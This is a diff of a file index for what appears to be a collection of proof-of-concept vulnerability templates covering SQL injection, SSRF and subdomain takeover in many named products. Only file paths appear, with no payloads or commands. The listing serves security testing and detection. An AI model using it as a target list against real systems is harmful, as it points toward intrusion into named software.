./poc/sql/open-user-map-c2ea245347709cabfb352a7cf46c6db8.yaml
-./poc/sql/openerp-database-9275.yaml
./poc/sql/openerp-database-9276.yaml
+./poc/sql/openerp-database-9277.yaml
./poc/sql/openerp-database-9278.yaml
./poc/sql/openerp-database.yaml
./poc/sql/opening-hours-9fde58251e15e0ed15dbb0f57c33cf3e.yaml
@@ -92187,14 +92174,11 @@
./poc/sql/option-tree-ae18e342651d194dbc1007204717b118.yaml
./poc/sql/oracle-dbass-detect-9349.yaml
./poc/sql/oracle-dbass-detect-9350.yaml
-./poc/sql/oracle-dbass-detect-9351.yaml
-./poc/sql/oracle-dbass-detect.yaml
./poc/sql/oracle-dbcs-9352.yaml
./poc/sql/oracle-dbcs-9353.yaml
./poc/sql/oracle-dbcs-9354.yaml
./poc/sql/oracle-dbcs-9355.yaml
./poc/sql/oracle-ebs-sqllog-disclosure-9367.yaml
-./poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml
./poc/sql/oracle-ebs-sqllog-disclosure-9370.yaml
./poc/sql/oracle-ebs-sqllog-disclosure-9371.yaml
./poc/sql/oracle-ebs-sqllog-disclosure-9372.yaml
@@ -92257,6 +92241,7 @@
./poc/sql/paytium-6bfa7db55abe86e184a7874b8579256d.yaml
./poc/sql/paytium-dbb33df02ad82d104f52342b9d1314f4.yaml
./poc/sql/payu-india-dfb44dbc510f4bea6f74c6a6cb7e4f69.yaml
+./poc/sql/pbootcms-database-file-download-9469.yaml
./poc/sql/pbootcms-database-file-download.yaml
./poc/sql/pbootcms-database-file-download.yml
./poc/sql/pdf-block-615a079e3552dbff38dc6dbbb7a3554e.yaml
@@ -92311,7 +92296,6 @@
./poc/sql/php-arcade-sqli.yaml
./poc/sql/php-event-calendar-12517f8593a63dbf79626b073a1f1de2.yaml
./poc/sql/php-everywhere-4214d6b172adab03dfd74f128fc5db19.yaml
-./poc/sql/phpmyadmin-sql-9534.yaml
./poc/sql/phpmyadmin-sql-9535.yaml
./poc/sql/phpmyadmin-sql-9536.yaml
./poc/sql/phpmyadmin-sql.php-server-1.yaml
@@ -92328,6 +92312,7 @@
./poc/sql/pie-register-1e2d1b7026d2269694eb54e49db13853.yaml
./poc/sql/pie-register-51840cf3f730edb817a845513e726762.yaml
./poc/sql/pie-register-edb5da07e3386d078b8f2dfd3f0d66a1.yaml
+./poc/sql/pikpikcusqli.yaml
./poc/sql/pinblocks-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/pinfinity-fcc940cb5d1edc9fa0dbfe45ecb68894.yaml
./poc/sql/piotnet-addons-for-elementor-pro-ff0dbabbd59c76a52ed540a831253c70.yaml
@@ -92474,6 +92459,7 @@
./poc/sql/qubely-c7df6e58b6d9b71a85834db950409116.yaml
./poc/sql/quick-adsense-0b4f61661156c48a0f3a621db781441d.yaml
./poc/sql/quick-affiliate-store-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/quick-cms-sqli.yaml
./poc/sql/quick-contact-form-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/quick-event-manager-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/quick-pagepost-redirect-plugin-f2e831db47ee0091e76581fa4f070672.yaml
@@ -92685,6 +92671,7 @@
./poc/sql/seaCMS-sqli.yaml
./poc/sql/seacms-dmku-sqli.yaml
./poc/sql/seacms-sqli(1).yaml
+./poc/sql/seacms-sqli-10103.yaml
./poc/sql/seacms-sqli.yml
./poc/sql/seacms-v101v11-comment-api-sqli.yaml
./poc/sql/seamless-donations-1c19a09a0db2341131db2ef5655ee08b.yaml
@@ -92922,8 +92909,8 @@
./poc/sql/springboot-h2-db-rce-10454.yaml
./poc/sql/springboot-h2-db-rce-10455.yaml
./poc/sql/springboot-h2-db-rce-10456.yaml
-./poc/sql/springboot-h2-db-rce-10457.yaml
./poc/sql/springboot-h2-db-rce-10458.yaml
+./poc/sql/springboot-h2-db-rce.yaml
./poc/sql/sprout-clients-503c868f614fe8f9ba65b257aadb9679.yaml
./poc/sql/sql-buddy.yaml
./poc/sql/sql-dump-1.yaml
@@ -92958,7 +92945,6 @@
./poc/sql/sql-server-report-viewer.yaml
./poc/sql/sql-server-reporting-10507.yaml
./poc/sql/sql-server-reporting-10508.yaml
-./poc/sql/sql-server-reporting-10509.yaml
./poc/sql/sql-server-reporting-10510.yaml
./poc/sql/sql-server-reporting.yaml
./poc/sql/sql-shortcode-003f309c7f400c3e24a0ee3414677f42.yaml
@@ -92979,7 +92965,6 @@
./poc/sql/sqli2.yaml
./poc/sql/sqli_b_sleep.yaml
./poc/sql/sqli_error.yaml
-./poc/sql/sqli_header-10504.yaml
./poc/sql/sqli_header.yaml
./poc/sql/sqliheader.yaml
./poc/sql/squaretype-091113ce7c8db36e32f582519aa46cca.yaml
@@ -93066,6 +93051,7 @@
./poc/sql/surveyfunnel-lite-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/surveys-6e9e122eb2e0c40dbc732f93cb774f75.yaml
./poc/sql/suspicious-sql-error-messages-10586.yaml
+./poc/sql/suspicious-sql-error-messages.yaml
./poc/sql/sv-provenexpert-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/sv-tracking-manager-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/svg-flags-lite-6477bf18cad6c823db485408d49b337b.yaml
@@ -93078,8 +93064,7 @@
./poc/sql/sydney-toolbox-6ebed23b763fe33f9cdffde1a1db7852.yaml
./poc/sql/symfony-database-config-10614.yaml
./poc/sql/symfony-database-config-10615.yaml
-./poc/sql/symfony-database-config-10616.yaml
-./poc/sql/symfony-database-config.yaml
+./poc/sql/symfony-database-config-10617.yaml
./poc/sql/sync-ecommerce-neo-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/synotec-holdings-sql-injection.yaml
./poc/sql/syntaxhighlighter-6af94db0b5d5eb521508ffb351943a35.yaml
@@ -93136,7 +93121,7 @@
./poc/sql/thumbs-db-disclosure-10760.yaml
./poc/sql/thumbs-db-disclosure-10761.yaml
./poc/sql/thumbs-db-disclosure-10762.yaml
-./poc/sql/thumbs-db-disclosure.yaml
+./poc/sql/thumbs-db-disclosure-10763.yaml
./poc/sql/thumbs-rating-2551aea37293f7feb377db28af59096c.yaml
./poc/sql/ti-woocommerce-wishlist-693cf8c022651775af0db87e0b8f752d.yaml
./poc/sql/ti-woocommerce-wishlist-premium-693cf8c022651775af0db87e0b8f752d.yaml
@@ -93144,8 +93129,8 @@
./poc/sql/ticket-manager-a759e03a3140ab5da9f810ffbdb3a4c2.yaml
./poc/sql/ticket-tailor-cd8902dc00bdb1b49cb56acbeb9ca9e4.yaml
./poc/sql/tidb-native-password.yaml
+./poc/sql/tidb-unauth-10770.yaml
./poc/sql/tidb-unauth-10771.yaml
-./poc/sql/tidb-unauth-10772.yaml
./poc/sql/tidb-unauth.yaml
./poc/sql/tidio-live-chat-5841edbae5f362f60a79d9cb73e8dd52.yaml
./poc/sql/tier-pricing-table-6477bf18cad6c823db485408d49b337b.yaml
@@ -93221,8 +93206,9 @@
./poc/sql/typofr-50c7a8d6d6928e0edbdd25d945accee8.yaml
./poc/sql/ubermenu-f5905ac46fc848b6b7db6aec714caee2.yaml
./poc/sql/ucmdb-default-login-10868.yaml
-./poc/sql/ucmdb-default-login-10869.yaml
./poc/sql/ucmdb-default-login-10870.yaml
+./poc/sql/ucmdb-default-login-10871.yaml
+./poc/sql/ucmdb-default-login.yaml
./poc/sql/ucontext-8226db0cec7c7280f1367e900997219e.yaml
./poc/sql/ulisting-5dbc01f7b0f6c2a386a3664610ac3e23.yaml
./poc/sql/ulisting-7866bac5db8939bd8423ae7ad6c6a87c.yaml
@@ -93268,6 +93254,7 @@
./poc/sql/ultra-seven-d155d6ddfe8bbad0ff5fa76ddb2b1f37.yaml
./poc/sql/unakit-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/unauth-psql.yaml
+./poc/sql/unauthenticated-influxdb-10903.yaml
./poc/sql/unauthenticated-influxdb.yaml
./poc/sql/uncanny-automator-5390a51d3ea1667fc8bdb736afeae941.yaml
./poc/sql/uncode-lite-d155d6ddfe8bbad0ff5fa76ddb2b1f37.yaml
@@ -93673,6 +93660,7 @@
./poc/sql/wordpress-db-backup-listing-11250.yaml
./poc/sql/wordpress-db-backup-listing.yaml
./poc/sql/wordpress-db-backup.yaml
+./poc/sql/wordpress-db-repair-11252.yaml
./poc/sql/wordpress-db-repair-11253.yaml
./poc/sql/wordpress-db-repair-11254.yaml
./poc/sql/wordpress-db-repair-11255.yaml
@@ -93702,7 +93690,6 @@
./poc/sql/wordpress-woocommerce-sqli-11342.yaml
./poc/sql/wordpress-woocommerce-sqli-11343.yaml
./poc/sql/wordpress-woocommerce-sqli-11344.yaml
-./poc/sql/wordpress-woocommerce-sqli-11345.yaml
./poc/sql/wordpress-woocommerce-sqli-2.yaml
./poc/sql/wordpress-woocommerce-sqli.yaml
./poc/sql/wordprezi-584db66faa21db5cdefc91cc7e54449b.yaml
@@ -94179,7 +94166,6 @@
./poc/sql/xcloner-backup-and-restore-af2601db04528a0b59f4305584ecbd5d.yaml
./poc/sql/xdcms-sql.yaml
./poc/sql/xdcms-sql.yml
-./poc/sql/xdcms-sqli-11664.yaml
./poc/sql/xdcms-sqli-11665.yaml
./poc/sql/xdcms-sqli-11666.yaml
./poc/sql/xdcms-sqli-11667.yaml
@@ -94221,6 +94207,7 @@
./poc/sql/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml
./poc/sql/yongyou-U8-sqli.yaml
./poc/sql/yongyou-jdbcRead.yaml
+./poc/sql/yongyou-jdbcread.yaml
./poc/sql/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml
./poc/sql/yongyou-u8-nc-bs-sm-login2-RegisterServlet-sql-Injection.yaml
./poc/sql/yongyou-u8-oa-sqli-11746.yaml
@@ -94273,7 +94260,6 @@
./poc/sql/z-url-preview-cb5a7484dbd994ed6e7ac4e9b63a5368.yaml
./poc/sql/zabbix-cve-2016-10134-sqli.yml
./poc/sql/zarzadzanie_kontem-8ddb37c6c3ab472d4eda177c23c07e30.yaml
-./poc/sql/zcms-v3-sqli-11773.yaml
./poc/sql/zcms-v3-sqli-11774.yaml
./poc/sql/zcms-v3-sqli-11775.yaml
./poc/sql/zcms-v3-sqli.yaml
@@ -94307,11 +94293,11 @@
./poc/sql_injection/74cms-show-sqli.yaml
./poc/sql_injection/74cms-sqli-1.yaml
./poc/sql_injection/74cms-sqli-1.yml
-./poc/sql_injection/74cms-sqli-10.yaml
./poc/sql_injection/74cms-sqli-2.yaml
./poc/sql_injection/74cms-sqli-2.yml
./poc/sql_injection/74cms-sqli-8.yaml
./poc/sql_injection/74cms-sqli-9.yaml
+./poc/sql_injection/74cms-sqli.yaml
./poc/sql_injection/74cms-sqli.yml
./poc/sql_injection/74cms_V3-plusa-sqli.yaml
./poc/sql_injection/74cms_v4-register-sqli.yaml
@@ -94566,9 +94552,10 @@
./poc/sql_injection/chamilo-lms-sqli-1.yaml
./poc/sql_injection/chamilo-lms-sqli-2.yaml
./poc/sql_injection/chamilo-lms-sqli-891.yaml
-./poc/sql_injection/chamilo-lms-sqli-892.yaml
+./poc/sql_injection/chamilo-lms-sqli.yaml
./poc/sql_injection/changjet-tplus-keyinfolist-sqli.yaml
./poc/sql_injection/chanjet-CRM-sqli.yaml
+./poc/sql_injection/chanjet-crm-sqli.yaml
./poc/sql_injection/chanjetcrm-sqli.yaml
./poc/sql_injection/chanjettplus-sqli.yaml
./poc/sql_injection/cmseasy-aid-sqli.yaml
@@ -94578,10 +94565,10 @@
./poc/sql_injection/dahua-wpms-searchjson-sqli .yaml
./poc/sql_injection/dedecms-guestbook-sqli.yaml
./poc/sql_injection/dedecms-guestbook-sqli.yml
+./poc/sql_injection/dedecms-membergroup-sqli-6796.yaml
./poc/sql_injection/dedecms-membergroup-sqli-6797.yaml
./poc/sql_injection/dedecms-membergroup-sqli-6798.yaml
./poc/sql_injection/dedecms-membergroup-sqli-6799.yaml
-./poc/sql_injection/dedecms-membergroup-sqli.yaml
./poc/sql_injection/dedecms-membergroup-sqli.yml
./poc/sql_injection/discuz-sqli-my.yaml
./poc/sql_injection/discuz-sqli-nds_up_ques.yaml
@@ -94589,7 +94576,6 @@
./poc/sql_injection/discuz-v72-sqli.yaml
./poc/sql_injection/discuz-v72-sqli.yml
./poc/sql_injection/dotnetcms-sqli-7089.yaml
-./poc/sql_injection/dotnetcms-sqli.yaml
./poc/sql_injection/dotnetcms-sqli.yml
./poc/sql_injection/drupal-cve-2014-3704-sqli.yml
./poc/sql_injection/duomicms-sqli.yaml
@@ -94606,6 +94592,7 @@
./poc/sql_injection/ecology-oa-filedownloadforoutdoc-sqli.yaml
./poc/sql_injection/ecology-sqli2.yaml
./poc/sql_injection/ecology-syncuserinfo-sqli-7177.yaml
+./poc/sql_injection/ecology-syncuserinfo-sqli.yaml
./poc/sql_injection/ecology-syncuserinfo-sqli.yml
./poc/sql_injection/ecology-v8-sqli.yaml
./poc/sql_injection/ecology-v8-sqli.yml
@@ -94620,6 +94607,7 @@
./poc/sql_injection/erensoft-sqli.yaml
./poc/sql_injection/errorbased_sqli.yaml
./poc/sql_injection/etouch-v2-sqli-7265.yaml
+./poc/sql_injection/etouch-v2-sqli-7266.yaml
./poc/sql_injection/etouch-v2-sqli-7267.yaml
./poc/sql_injection/etouch-v2-sqli-7268.yaml
./poc/sql_injection/etouch-v2-sqli.yml
@@ -94676,7 +94664,6 @@
./poc/sql_injection/joomla-sqli-hdwplayer.yaml
./poc/sql_injection/joomla-sqli-vnmshop.yaml
./poc/sql_injection/joomla-sqli-weblinks_categories.yaml
-./poc/sql_injection/kevinlab-bems-sqli-8457.yaml
./poc/sql_injection/kevinlab-bems-sqli-8458.yaml
./poc/sql_injection/kevinlab-bems-sqli-8459.yaml
./poc/sql_injection/kevinlab-bems-sqli-8460.yaml
@@ -94708,12 +94695,14 @@
./poc/sql_injection/qianxin-360-tianqing-rptsvcsyncpoint-sqli.yaml
./poc/sql_injection/qibocms-sqli.yaml
./poc/sql_injection/qibocms-sqli.yml
+./poc/sql_injection/quick-cms-sqli.yaml
./poc/sql_injection/realor-appdel-sqli.yaml
./poc/sql_injection/realor-appsave-sqli-rce.yaml
./poc/sql_injection/realor_tianyi_avs_demo_sql_injection.yaml
./poc/sql_injection/seaCMS-sqli.yaml
./poc/sql_injection/seacms-dmku-sqli.yaml
./poc/sql_injection/seacms-sqli(1).yaml
+./poc/sql_injection/seacms-sqli-10103.yaml
./poc/sql_injection/seacms-sqli.yml
./poc/sql_injection/seacms-v101v11-comment-api-sqli.yaml
./poc/sql_injection/seeyon-wooyun-2015-0108235-sqli.yaml
@@ -94733,10 +94722,10 @@
./poc/sql_injection/sqli-symfony.yaml
./poc/sql_injection/sqli-vuln-params-deep.yaml
./poc/sql_injection/sqli-vuln-params.yaml
+./poc/sql_injection/sqli.yaml
./poc/sql_injection/sqli2.yaml
./poc/sql_injection/sqli_b_sleep.yaml
./poc/sql_injection/sqli_error.yaml
-./poc/sql_injection/sqli_header-10504.yaml
./poc/sql_injection/sqli_header.yaml
./poc/sql_injection/sqliheader.yaml
./poc/sql_injection/stackposts-sqli.yaml
@@ -94793,7 +94782,6 @@
./poc/sql_injection/wordpress-woocommerce-sqli-11342.yaml
./poc/sql_injection/wordpress-woocommerce-sqli-11343.yaml
./poc/sql_injection/wordpress-woocommerce-sqli-11344.yaml
-./poc/sql_injection/wordpress-woocommerce-sqli-11345.yaml
./poc/sql_injection/wordpress-woocommerce-sqli-2.yaml
./poc/sql_injection/wordpress-woocommerce-sqli.yaml
./poc/sql_injection/wp-advanced-search-sqli.yaml
@@ -94805,7 +94793,6 @@
./poc/sql_injection/wuzhicms-sqli-11659.yaml
./poc/sql_injection/wuzhicms-v410-sqli.yaml
./poc/sql_injection/wuzhicms-v410-sqli.yml
-./poc/sql_injection/xdcms-sqli-11664.yaml
./poc/sql_injection/xdcms-sqli-11665.yaml
./poc/sql_injection/xdcms-sqli-11666.yaml
./poc/sql_injection/xdcms-sqli-11667.yaml
@@ -94848,7 +94835,6 @@
./poc/sql_injection/yungoucms-sqli.yaml
./poc/sql_injection/yungoucms-sqli.yml
./poc/sql_injection/zabbix-cve-2016-10134-sqli.yml
-./poc/sql_injection/zcms-v3-sqli-11773.yaml
./poc/sql_injection/zcms-v3-sqli-11774.yaml
./poc/sql_injection/zcms-v3-sqli-11775.yaml
./poc/sql_injection/zcms-v3-sqli.yaml
@@ -95064,11 +95050,12 @@
./poc/ssrf/blind-ssrf.yaml
./poc/ssrf/blind_ssrf.yaml
./poc/ssrf/cloudflare-image-ssrf-1020.yaml
+./poc/ssrf/cloudflare-image-ssrf-1021.yaml
./poc/ssrf/cloudflare-image-ssrf-1022.yaml
./poc/ssrf/cloudflare-image-ssrf-1023.yaml
./poc/ssrf/confluence-ssrf-sharelinks-1190.yaml
./poc/ssrf/confluence-ssrf-sharelinks-1191.yaml
-./poc/ssrf/confluence-ssrf-sharelinks-1193.yaml
+./poc/ssrf/confluence-ssrf-sharelinks-1192.yaml
./poc/ssrf/confluence-ssrf-sharelinks-1194.yaml
./poc/ssrf/custom-microsoft-ssrf-detect.yaml
./poc/ssrf/custom-weblogic-SSRF-detect.yaml
@@ -95081,6 +95068,7 @@
./poc/ssrf/gitlab-ssrf-cve-2021-22214.yml
./poc/ssrf/hasura-graphql-ssrf-7903.yaml
./poc/ssrf/hasura-graphql-ssrf-7904.yaml
+./poc/ssrf/hasura-graphql-ssrf-7905.yaml
./poc/ssrf/hasura-graphql-ssrf-7906.yaml
./poc/ssrf/hasura-graphql-ssrf.yaml
./poc/ssrf/header-blind-ssrf.yaml
@@ -95105,7 +95093,7 @@
./poc/ssrf/microstrategy-ssrf-8861.yaml
./poc/ssrf/microstrategy-ssrf.yaml
./poc/ssrf/office-webapps-ssrf.yaml
-./poc/ssrf/openbmcs-ssrf-9261.yaml
+./poc/ssrf/openbmcs-ssrf.yaml
./poc/ssrf/openfire-cve-2019-18394-ssrf.yml
./poc/ssrf/poc-yaml-vmware-vcenter-ssrf.yaml
./poc/ssrf/request-backets-ssrf.yaml
@@ -95138,14 +95126,13 @@
./poc/ssrf/umbraco-base-ssrf-10882.yaml
./poc/ssrf/umbraco-base-ssrf-2.yaml
./poc/ssrf/umbraco-base-ssrf-3.yaml
-./poc/ssrf/umbraco-base-ssrf.yaml
./poc/ssrf/vmware-vcenter-ssrf-11051.yaml
./poc/ssrf/vmware-vcenter-ssrf-11052.yaml
./poc/ssrf/vmware-vcenter-ssrf-11053.yaml
./poc/ssrf/vmware-vrealize-cve-2021-21975-ssrf.yml
+./poc/ssrf/w3c-total-cache-ssrf-11077.yaml
./poc/ssrf/w3c-total-cache-ssrf-11078.yaml
./poc/ssrf/w3c-total-cache-ssrf-11079.yaml
-./poc/ssrf/w3c-total-cache-ssrf-11080.yaml
./poc/ssrf/w3c-total-cache-ssrf-11081.yaml
./poc/ssrf/weblogic-ssrf.yaml
./poc/ssrf/weblogic-ssrf.yml
@@ -95158,6 +95145,7 @@
./poc/ssrf/wp-multiple-theme-ssrf-11510.yaml
./poc/ssrf/wp-multiple-theme-ssrf-11511.yaml
./poc/ssrf/wp-multiple-theme-ssrf-11512.yaml
+./poc/ssrf/wp-multiple-theme-ssrf-11513.yaml
./poc/ssrf/wp-plugin-canto-ssrf.yaml
./poc/ssrf/wp-under-construction-ssrf.yaml
./poc/ssrf/wso2-ssrf.yaml
@@ -95167,10 +95155,10 @@
./poc/ssrf/xmlrpc-pingback-ssrf-11688.yaml
./poc/ssrf/xmlrpc-pingback-ssrf-11690.yaml
./poc/ssrf/xmlrpc-pingback-ssrf.yaml
-./poc/ssrf/yongyou-ssrf-11745.yaml
./poc/ssrf/yongyou-ssrf.yaml
./poc/ssrf/zimbra-preauth-ssrf-11809.yaml
./poc/ssrf/zimbra-preauth-ssrf-11810.yaml
+./poc/ssrf/zimbra-preauth-ssrf.yaml
./poc/ssrf/zzzcms-ssrf.yaml
./poc/subdomain_takeover/account-takeover-via-registration.yaml
./poc/subdomain_takeover/acquia-takeover-34.yaml
@@ -95178,19 +95166,22 @@
./poc/subdomain_takeover/aftership-takeover-202.yaml
./poc/subdomain_takeover/aftership-takeover-203.yaml
./poc/subdomain_takeover/aftership-takeover-204.yaml
+./poc/subdomain_takeover/aftership-takeover-205.yaml
./poc/subdomain_takeover/aftership-takeover-206.yaml
+./poc/subdomain_takeover/agilecrm-takeover-208.yaml
./poc/subdomain_takeover/agilecrm-takeover-209.yaml
./poc/subdomain_takeover/agilecrm-takeover-210.yaml
./poc/subdomain_takeover/agilecrm-takeover-211.yaml
./poc/subdomain_takeover/aha-takeover-213.yaml
./poc/subdomain_takeover/aha-takeover-214.yaml
./poc/subdomain_takeover/aha-takeover-215.yaml
+./poc/subdomain_takeover/aha-takeover-216.yaml
./poc/subdomain_takeover/aha-takeover-217.yaml
+./poc/subdomain_takeover/airee-takeover-226.yaml
./poc/subdomain_takeover/airee-takeover-227.yaml
-./poc/subdomain_takeover/airee-takeover-228.yaml
./poc/subdomain_takeover/airee-takeover.yaml
./poc/subdomain_takeover/anima-takeover-317.yaml
-./poc/subdomain_takeover/anima-takeover-318.yaml
+./poc/subdomain_takeover/anima-takeover-319.yaml
./poc/subdomain_takeover/anima-takeover-320.yaml
./poc/subdomain_takeover/anima-takeover.yaml
./poc/subdomain_takeover/announcekit-takeover-322.yaml
@@ -95204,25 +95195,26 @@
./poc/subdomain_takeover/azure-takeover-detection-682.yaml
./poc/subdomain_takeover/azure-takeover-detection-683.yaml
./poc/subdomain_takeover/azure-takeover-detection.yaml
-./poc/subdomain_takeover/bigcartel-takeover-727.yaml
+./poc/subdomain_takeover/bigcartel-takeover-728.yaml
./poc/subdomain_takeover/bigcartel-takeover-729.yaml
./poc/subdomain_takeover/bigcartel-takeover.yaml
+./poc/subdomain_takeover/bitbucket-takeover-738.yaml
./poc/subdomain_takeover/bitbucket-takeover-739.yaml
-./poc/subdomain_takeover/bitbucket-takeover-740.yaml
./poc/subdomain_takeover/bitbucket-takeover-741.yaml
./poc/subdomain_takeover/bitbucket-takeover.yaml
-./poc/subdomain_takeover/brightcove-takeover-785.yaml
+./poc/subdomain_takeover/brightcove-takeover-783.yaml
+./poc/subdomain_takeover/brightcove-takeover-784.yaml
./poc/subdomain_takeover/brightcove-takeover.yaml
./poc/subdomain_takeover/campaignmonitor-takeover.yaml
+./poc/subdomain_takeover/canny-takeover-854.yaml
./poc/subdomain_takeover/canny-takeover-855.yaml
./poc/subdomain_takeover/canny-takeover-856.yaml
-./poc/subdomain_takeover/canny-takeover-857.yaml
./poc/subdomain_takeover/canny-takeover.yaml
./poc/subdomain_takeover/cargo-takeover-866.yaml
-./poc/subdomain_takeover/cargo-takeover-868.yaml
+./poc/subdomain_takeover/cargo-takeover-867.yaml
./poc/subdomain_takeover/cargo-takeover-869.yaml
./poc/subdomain_takeover/cargo-takeover.yaml
-./poc/subdomain_takeover/cargocollective-takeover-862.yaml
+./poc/subdomain_takeover/cargocollective-takeover-863.yaml
./poc/subdomain_takeover/cargocollective-takeover-864.yaml
./poc/subdomain_takeover/cargocollective-takeover-865.yaml
./poc/subdomain_takeover/cargocollective-takeover.yaml
@@ -95230,6 +95222,7 @@
./poc/subdomain_takeover/detect-all-takeover.yaml
./poc/subdomain_takeover/detect-all-takeovers.yaml
./poc/subdomain_takeover/elasticbeanstalk-takeover.yaml
+./poc/subdomain_takeover/elasticbeantalk-takeover-7188.yaml
./poc/subdomain_takeover/elasticbeantalk-takeover.yaml
./poc/subdomain_takeover/fastly-takeover-7429.yaml
./poc/subdomain_takeover/fastly-takeover.yaml
@@ -95237,30 +95230,35 @@
./poc/subdomain_takeover/feedpress-takeover-7456.yaml
./poc/subdomain_takeover/feedpress-takeover.yaml
./poc/subdomain_takeover/flexbe-takeover-7504.yaml
+./poc/subdomain_takeover/flexbe-takeover-7505.yaml
./poc/subdomain_takeover/flexbe-takeover-7506.yaml
./poc/subdomain_takeover/flexbe-takeover.yaml
+./poc/subdomain_takeover/flywheel-takeover-7525.yaml
./poc/subdomain_takeover/flywheel-takeover-7526.yaml
./poc/subdomain_takeover/flywheel-takeover.yaml
./poc/subdomain_takeover/flywheel_takeover.yaml
-./poc/subdomain_takeover/freshdesk-takeover-7540.yaml
+./poc/subdomain_takeover/freshdesk-takeover-7541.yaml
./poc/subdomain_takeover/freshdesk-takeover.yaml
./poc/subdomain_takeover/freshservice-takeover.yaml
+./poc/subdomain_takeover/frontify-takeover-7542.yaml
./poc/subdomain_takeover/frontify-takeover-7543.yaml
./poc/subdomain_takeover/frontify-takeover-7544.yaml
./poc/subdomain_takeover/frontify-takeover.yaml
./poc/subdomain_takeover/gemfury-takeover-7576.yaml
./poc/subdomain_takeover/gemfury-takeover-7577.yaml
+./poc/subdomain_takeover/gemfury-takeover-7578.yaml
./poc/subdomain_takeover/gemfury-takeover-7579.yaml
./poc/subdomain_takeover/gemfury-takeover.yaml
-./poc/subdomain_takeover/getresponse-takeover-7607.yaml
./poc/subdomain_takeover/getresponse-takeover-7608.yaml
+./poc/subdomain_takeover/getresponse-takeover-7609.yaml
./poc/subdomain_takeover/getresponse-takeover-7610.yaml
./poc/subdomain_takeover/getresponse-takeover.yaml
+./poc/subdomain_takeover/ghost-takeover-7619.yaml
./poc/subdomain_takeover/ghost-takeover-7620.yaml
-./poc/subdomain_takeover/ghost-takeover-7621.yaml
./poc/subdomain_takeover/ghost-takeover-7622.yaml
./poc/subdomain_takeover/ghost-takeover.yaml
./poc/subdomain_takeover/gitbook-takeover-7626.yaml
+./poc/subdomain_takeover/gitbook-takeover-7627.yaml
./poc/subdomain_takeover/gitbook-takeover.yaml
./poc/subdomain_takeover/github-takeover-7658.yaml
./poc/subdomain_takeover/github-takeover-7659.yaml
@@ -95269,52 +95267,52 @@
./poc/subdomain_takeover/github-takeover-7662.yaml
./poc/subdomain_takeover/github-takeover-7663.yaml
./poc/subdomain_takeover/github-takeover.yaml
+./poc/subdomain_takeover/hatenablog-takeover-7907.yaml
./poc/subdomain_takeover/hatenablog-takeover-7908.yaml
./poc/subdomain_takeover/hatenablog-takeover-7909.yaml
./poc/subdomain_takeover/hatenablog-takeover-7910.yaml
./poc/subdomain_takeover/hatenablog-takeover.yaml
-./poc/subdomain_takeover/helpjuice-takeover-7925.yaml
+./poc/subdomain_takeover/helpjuice-takeover-7926.yaml
./poc/subdomain_takeover/helpjuice-takeover-7927.yaml
./poc/subdomain_takeover/helpjuice-takeover-7928.yaml
./poc/subdomain_takeover/helpjuice-takeover.yaml
./poc/subdomain_takeover/helprace-takeover-7929.yaml
+./poc/subdomain_takeover/helprace-takeover-7930.yaml
./poc/subdomain_takeover/helprace-takeover-7931.yaml
-./poc/subdomain_takeover/helprace-takeover-7932.yaml
./poc/subdomain_takeover/helprace-takeover.yaml
./poc/subdomain_takeover/helpscout-takeover-7933.yaml
./poc/subdomain_takeover/helpscout-takeover-7934.yaml
./poc/subdomain_takeover/helpscout-takeover-7935.yaml
+./poc/subdomain_takeover/helpscout-takeover-7936.yaml
./poc/subdomain_takeover/helpscout-takeover.yaml
./poc/subdomain_takeover/heroku-takeover-7941.yaml
./poc/subdomain_takeover/heroku-takeover-7942.yaml
./poc/subdomain_takeover/heroku-takeover-7943.yaml
-./poc/subdomain_takeover/heroku-takeover-7944.yaml
./poc/subdomain_takeover/heroku-takeover.yaml
./poc/subdomain_takeover/hubspot-takeover-8077.yaml
./poc/subdomain_takeover/hubspot-takeover-8078.yaml
./poc/subdomain_takeover/hubspot-takeover-8079.yaml
./poc/subdomain_takeover/hubspot-takeover.yaml
-./poc/subdomain_takeover/intercom-takeover-8167.yaml
+./poc/subdomain_takeover/intercom-takeover-8166.yaml
./poc/subdomain_takeover/intercom-takeover-8168.yaml
./poc/subdomain_takeover/intercom-takeover-8169.yaml
./poc/subdomain_takeover/intercom-takeover.yaml
./poc/subdomain_takeover/jazzhr-takeover-8233.yaml
./poc/subdomain_takeover/jazzhr-takeover-8234.yaml
+./poc/subdomain_takeover/jazzhr-takeover-8235.yaml
./poc/subdomain_takeover/jazzhr-takeover.yaml
+./poc/subdomain_takeover/jetbrains-takeover-8292.yaml
./poc/subdomain_takeover/jetbrains-takeover-8293.yaml
./poc/subdomain_takeover/jetbrains-takeover-8294.yaml
./poc/subdomain_takeover/jetbrains-takeover.yaml
./poc/subdomain_takeover/kinsta-takeover-8492.yaml
./poc/subdomain_takeover/kinsta-takeover-8493.yaml
./poc/subdomain_takeover/kinsta-takeover-8494.yaml
-./poc/subdomain_takeover/kinsta-takeover-8495.yaml
./poc/subdomain_takeover/kinsta-takeover.yaml
-./poc/subdomain_takeover/landingi-takeover-8567.yaml
+./poc/subdomain_takeover/landingi-takeover-8566.yaml
./poc/subdomain_takeover/landingi-takeover.yaml
-./poc/subdomain_takeover/launchrock-takeover-8602.yaml
./poc/subdomain_takeover/launchrock-takeover-8603.yaml
./poc/subdomain_takeover/launchrock-takeover-8604.yaml
-./poc/subdomain_takeover/launchrock-takeover-8605.yaml
./poc/subdomain_takeover/launchrock-takeover.yaml
./poc/subdomain_takeover/leadpages-takeover.yaml
./poc/subdomain_takeover/locomotivetakeover.yaml
@@ -95328,64 +95326,63 @@
./poc/subdomain_takeover/netlify-takeover-9042.yaml
./poc/subdomain_takeover/netlify-takeover-9043.yaml
./poc/subdomain_takeover/netlify-takeover.yaml
-./poc/subdomain_takeover/ngrok-takeover-9126.yaml
./poc/subdomain_takeover/ngrok-takeover-9127.yaml
+./poc/subdomain_takeover/ngrok-takeover-9128.yaml
./poc/subdomain_takeover/ngrok-takeover-9129.yaml
